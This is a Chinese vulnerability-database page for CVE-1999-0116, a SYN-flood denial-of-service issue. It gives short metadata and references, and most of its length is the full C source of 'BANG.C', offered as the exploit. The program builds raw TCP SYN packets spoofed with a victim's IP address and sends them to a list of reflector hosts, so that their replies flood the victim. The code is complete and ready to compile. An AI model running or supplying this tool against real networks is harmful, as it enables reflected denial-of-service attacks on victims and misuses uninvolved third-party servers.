SYN数据包拒绝服务漏洞

SYN数据包拒绝服务漏洞

漏洞ID 1106977 漏洞类型 未知
发布时间 2002-09-17 更新时间 2002-09-17
图片[1]-SYN数据包拒绝服务漏洞-安全小百科CVE编号 CVE-1999-0116
图片[2]-SYN数据包拒绝服务漏洞-安全小百科CNNVD-ID CNNVD-199609-006
漏洞平台 BSD CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/343
https://www.securityfocus.com/bid/80190
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199609-006
|漏洞详情
攻击者可以发送许多SYN数据包创建多个连接导致服务拒绝,该连接没有通过发送ACK来完成,也称为SYNflood。
|漏洞EXP
/* 
 * BANG.C Coded by Sorcerer of DALnet
 *
 * FUCKZ to: etech, blazin, udp, hybrid and kdl
 * PROPZ : skrilla, thanks for all your help with JUNO-Z and especially this code :)
 *             -------------------------------- 
 * REDIRECTION DOS FINALLY DISTRIBUTED !!!!!!
 *
 * This is POC and demonstrates a new method of DoS. The idea
 * behind it is that the attacker generates connection requests
 * to a list of hosts which have a TCP service running such as
 * http (80), telnet (23) etc. from the ip of the victim host.
 * This will result all of the hosts that the victim *requested*
 * connections to send back packets (usually SYN-ACK's) 2-3 of
 * them (amplification comes here!) causing load to the victim
 * by cauzing the victim to send RST packets since it never actually
 * requested any such connection. This attack is dangerous since
 * its almost impossible to filter!!
 *
 * hosts file should be in the format of 1 ip:port per line
 * i.e. 194.66.25.97:80
 *      130.88.172.194:23
 *      65.161.42.42:6667
 * NOTE: target should only be ip, and all the hosts on the list should
 * also be ips thats for speed issues.
 * 
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>

#define __FAVOR_BSD

#include <arpa/inet.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>


unsigned short int getrandportid(void);
unsigned short in_cksum(u_short *addr, int len);
short int send_syn(unsigned long int , unsigned long int, unsigned short int);
int sox;

struct pseudo {
  unsigned long srca, dsta;
  unsigned char zero, proto;
  unsigned short tcplen;
};

struct checksum {
  struct pseudo pp;
  struct tcphdr tt;
};

/* Taken out since only works on x86 and rdtsc is also only pentium specific */
#if 0
/* Thanks to skrilla :) */
unsigned short mktcpsum1(struct packet *p,int len) {
  unsigned short old_sum = p->tcpsum;
  unsigned long s = (unsigned long)&p->sport;
  unsigned long sum = ((p->src >> 16) + (p->src & 0xffff) + (p->dst >> 16) +
		       (p->dst & 0xffff) + (__htons__(6) + __htons__(len-20)));
  
  p->tcpsum=0;
  __asm__ __volatile__ (
			/*"xorl %%eax,%%eax;"
			  "cmpl $2,%%ecx;"
			  "jb 1f;"
			  "0:;"
			  "lodsw;"
			  "addw %%ax,%%dx;"
			  "jnc 9f;"
			  "addl $65536,%%edx;"
			  "9:;"
			  "decl %%ecx;"
			  "loop 0b;"
			  "1:;"
			  "orb %%cl,%%cl;"
			  "jz 2f;"
			  "xorw %%ax,%%ax;"
			  "lodsb;"
			  "addw %%ax,%%dx;"
			  "jnz 2f;"
			  "addl $65536,%%edx;"
			  "2:;"
			  "movw %%dx,%%ax;"
			  "shrl $16,%%edx;"
			  "addw %%ax,%%dx;"
			  "adcl $0xffff0000,%%edx;"
			  "xorw $65535,%%dx;"*/
			
			"movw %%dx,%%ax;"
			"shrl $16,%%edx;"
			"addw %%ax,%%dx;"
			"adcw $0,%%dx;"
			
			"testl $1,%%ecx;"
			"jz 0f;"
			"xorw %%ax,%%ax;"
			"lodsb;"
			"addw %%ax,%%dx;"
			"adcw $0,%%dx;"
			"0:;"
			"shrl $1,%%ecx;"
			"1:;"
			"lodsw;"
			"addw %%ax,%%dx;"
			"adcw $0,%%dx;"
			"loop 1b;"
			"andl $65535,%%edx;"
			"xorw $65535,%%dx;"
			
			:"=edx"(sum):"edx"(sum),"ecx"(len-20),"S"(&p->sport):"eax");
  p->tcpsum=old_sum;
  return(sum);
}

unsigned long long int
rdtsc(void) {
  unsigned long long int tsc;
  unsigned long int tsc_l,tsc_h;
  __asm__ volatile("rdtsc":"=%eax"(tsc_l),"=d"(tsc_h));
  tsc=tsc_h;
  tsc=(tsc<<32)|tsc_l;
  return(tsc);
}
#endif

int
main(int argc, char **argv)
{
  int                 enable=1,tmp,tmp2, loop, count=0;
  char               *lala, *tmp1, buf[25];
  unsigned long int   ip[1000000], src;
  unsigned short int  port[1000000];
  FILE               *fp;
  struct timeval      start, end;

  printf("nCoded by Sorcerer of DALnetnn");
  
  if(argc != 4){
    fprintf(stderr, "Incorrect usage try: %s <victim> <host-file> <loop host-file>an", *argv);
    fprintf(stderr, "Example:             %s 127.0.0.1 myhostsfile.txt 3nn", *argv);
    return(-1);
  }
  
  fp = fopen(argv[2], "r");
  if(fp == NULL){
    fprintf(stderr, "Error while opening: %sn", argv[2]);
    perror("fopen");
    return(-1);
  }
  
  loop = atoi(argv[3]);
  if(loop == 0){
    fprintf(stderr, "Cannot loop 0 times you need to loop at least oncen");
    return(-1);
  }
  
  for(tmp=0;tmp<=1000000;tmp++){
    ip[tmp] = htons(23);
    port[tmp] = htons(23);
  }

  sox = socket(PF_INET, SOCK_RAW, 6);
  if(sox == -1){ perror("socket"); return(-1); }
  
  tmp = setsockopt(sox, IPPROTO_IP, IP_HDRINCL, &enable, sizeof(enable));
  if(tmp == -1){ perror("setsockopt"); return(-1); }

    
  printf("Reading ips on memory and reconstructing in network byte order...n"); fflush(stdout);
  
  while(1){
    memset(buf, 0, 25);

    tmp1 = fgets(buf, 25, fp);
    if(tmp1 == NULL) break;
    
    if(strlen(buf) < 9) {
      printf("Bogus entry: %sn", buf);
      continue;
    }
    
    lala = strchr((char *)&buf, ':');

    port[count] = htons(atoi(++lala));

    buf[strlen(buf)-strlen(lala)-1] = '';

    ip[count] = inet_addr(buf);

    count++;
    printf("."); fflush(stdout);
  }

  printf("Done.n");

  src = inet_addr(argv[1]);

  tmp = gettimeofday((struct timeval *)&start, NULL);
  if(tmp == -1){ perror("gettimeofday"); return(-1); }
  

  for(tmp2=0;tmp2<loop;tmp2++)
    for(tmp=0;tmp<count;tmp++)
      send_syn(src, ip[tmp], port[tmp]);
  

  tmp = gettimeofday((struct timeval *)&end, NULL);
  if(tmp == -1){ perror("gettimeofday"); return(-1); }
  
  printf("nTotal time taken: %lunBytes sent: %dn", (end.tv_sec+end.tv_usec)-(start.tv_sec+start.tv_usec), count*loop*sizeof(char)*sizeof(struct ip)*sizeof(struct tcphdr));
  
  return 0;
}

short int
send_syn(unsigned long int src, unsigned long int dst, unsigned short int port)
{
  struct sockaddr_in  s;
  struct ip           *i;
  struct tcphdr       *t;
  struct pseudo       p;
  struct checksum     c;
  char                packet[sizeof(char)*(sizeof(struct ip)+sizeof(struct tcphdr))];
  int                 tmp;

  s.sin_family       = PF_INET;
  s.sin_port         = port;
  s.sin_addr.s_addr  = dst;
 
  i = (struct ip *)&packet;
  t = (struct tcphdr *)((int)i+sizeof(struct ip));

  memset(&packet, 0, sizeof(packet));

  i->ip_hl         = 5;
  i->ip_v          = 4;
  i->ip_tos        = 0x08;
  i->ip_len        = htons(sizeof(packet));
  i->ip_id         = htons(getrandportid());
  i->ip_off        = 0;
  i->ip_ttl        = 255;
  i->ip_p          = 6;
  i->ip_sum        = 0;
  i->ip_src.s_addr = src;
  i->ip_dst.s_addr = dst;


  t->th_sport = htons(getrandportid());
  t->th_dport = port;
  t->th_seq   = htons(getrandportid());
  t->th_ack   = 0;
  t->th_x2    = 0;
  t->th_off   = 5;
  t->th_flags = 0x02;
  t->th_win   = 65535;
  t->th_urp   = 0;
  t->th_sum   = 0;

  p.srca      = src;
  p.dsta      = dst;
  p.proto     = 6;
  p.tcplen    = htons(sizeof(struct tcphdr));
  p.zero      = 0;
  
  memcpy(&c.pp, &p, sizeof(p));
  memcpy(&c.tt, t, sizeof(struct tcphdr));

  t->th_sum    = in_cksum((void *)&c, sizeof(c));

  tmp = sendto(sox, packet, ntohs(i->ip_len), MSG_DONTWAIT, (struct sockaddr *)&s, sizeof(s));
  if(tmp == -1){
    perror("sendto");
    return(-1);
  }

  return 0;
}

unsigned short int
getrandportid(void)
{
  unsigned short int port;
  struct timeval tv;

  gettimeofday((struct timeval *)&tv, NULL);
  srand(tv.tv_sec+tv.tv_usec);

  port = rand()+1;

  return(port);
}


/* Slow shit checksum function from RFC */
u_short 
in_cksum(u_short *addr, int len)
{
  register int nleft = len;
  register u_short *w = addr;
  register int sum = 0;
  u_short answer = 0;
  
  while (nleft > 1)  {
    sum += *w++;
    nleft -= 2;
  }
  
  
  if (nleft == 1) {
    *(u_char *)(&answer) = *(u_char *) w;
    sum += answer;
  }
  
  sum = (sum >> 16) + (sum & 0xffff);
  sum += (sum >> 16);
  answer = ~sum;
  return(answer);
}

// milw0rm.com [2002-09-17]
|受影响的产品
IBM AIX 4.2

IBM AIX 4.1

IBM AIX 3.2.5

|参考资料

来源:SUN
名称:00136
链接:http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc;=secbull/136
来源:SGI
名称:19961202-01-PX
链接:ftp://patches.sgi.com/support/free/security/advisories/19961202-01-PX

相关推荐: HP Praesidium Webproxy Unauthorized Access Vulnerability

HP Praesidium Webproxy Unauthorized Access Vulnerability 漏洞ID 1102278 漏洞类型 Access Validation Error 发布时间 2002-03-22 更新时间 2002-03-22…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享